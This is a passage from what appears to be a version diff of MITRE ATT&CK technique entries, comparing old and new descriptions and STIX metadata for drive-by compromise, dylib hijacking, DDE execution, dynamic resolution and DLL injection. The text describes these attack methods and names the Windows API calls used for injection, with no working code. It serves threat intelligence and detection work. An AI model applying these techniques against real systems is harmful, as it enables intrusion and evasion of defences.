boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 01:37:46.704000+00:00 | 2022-03-08 21:11:47.798000+00:00 |
| description | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) |
| x_mitre_data_sources[0] | File: File Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Process: Process Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | File: File Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Process: Process Creation |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:27:38.793000+00:00 | 2022-03-08 21:59:57.082000+00:00 |
| description | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). | Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021. | |
| external_references | CAPEC-471 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-471 | |
| external_references | Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 20:19:15.212000+00:00 | 2022-05-05 04:08:30.203000+00:00 |
| external_references[1]['source_name'] | capec | MalwareUnicorn macOS Dylib Injection MachO |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/471.html | https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 |
| external_references[2]['source_name'] | Wardle Dylib Hijack Vulnerable Apps | Apple Developer Doco Archive Run-Path |
| external_references[2]['description'] | Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021. | Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021. |
| external_references[2]['url'] | https://objective-see.com/blog/blog_0x46.html | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html |
| external_references[4]['source_name'] | Github EmpireProject HijackScanner | Writing Bad Malware for OSX |
| external_references[4]['description'] | Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021. | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. |
| external_references[4]['url'] | https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf |
| external_references[5]['source_name'] | Github EmpireProject CreateHijacker Dylib | Wardle Dylib Hijack Vulnerable Apps |
| external_references[5]['description'] | Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021. | Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021. |
| external_references[5]['url'] | https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py | https://objective-see.com/blog/blog_0x46.html |
| external_references[6]['source_name'] | Writing Bad Malware for OSX | wardle artofmalware volume1 |
| external_references[6]['description'] | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. |
| external_references[6]['url'] | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf | https://taomm.org/vol1/pdfs.html |
| external_references[7]['source_name'] | wardle artofmalware volume1 | Github EmpireProject HijackScanner |
| external_references[7]['description'] | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. | Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021. |
| external_references[7]['url'] | https://taomm.org/vol1/pdfs.html | https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py |
| external_references[8]['source_name'] | MalwareUnicorn macOS Dylib Injection MachO | Github EmpireProject CreateHijacker Dylib |
| external_references[8]['description'] | Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021. | Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021. |
| external_references[8]['url'] | https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 | https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py |
| external_references[9]['source_name'] | Apple Developer Doco Archive Run-Path | capec |
| external_references[9]['url'] | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html | https://capec.mitre.org/data/definitions/471.html |
| x_mitre_data_sources[0] | File: File Creation | File: File Modification |
| x_mitre_data_sources[1] | File: File Modification | File: File Creation |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
| Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) | Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 22:52:04.196000+00:00 | 2022-02-22 13:22:30.191000+00:00 |
| description | Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) | Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) |
| external_references[8]['source_name'] | Fireeye Hunting COM June 2019 | OWASP CSV Injection |
| external_references[8]['description'] | Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019. | Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022. |
| external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html | https://owasp.org/www-community/attacks/CSV_Injection |
| external_references[9]['source_name'] | NVisio Labs DDE Detection Oct 2017 | CSV Excel Macro Injection |
| external_references[9]['description'] | NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017. | Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022. |
| external_references[9]['url'] | https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ | https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/ |
| x_mitre_detection | Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017) | Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'} | |
| external_references | {'source_name': 'NVisio Labs DDE Detection Oct 2017', 'description': 'NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.', 'url': 'https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/'} | |
| x_mitre_data_sources | Script: Script Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution |
| Description |
|---|
| Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-02 01:37:39.938000+00:00 | 2022-03-11 18:26:23.782000+00:00 |
| Old Description | New Description |
|---|---|
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. |
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.
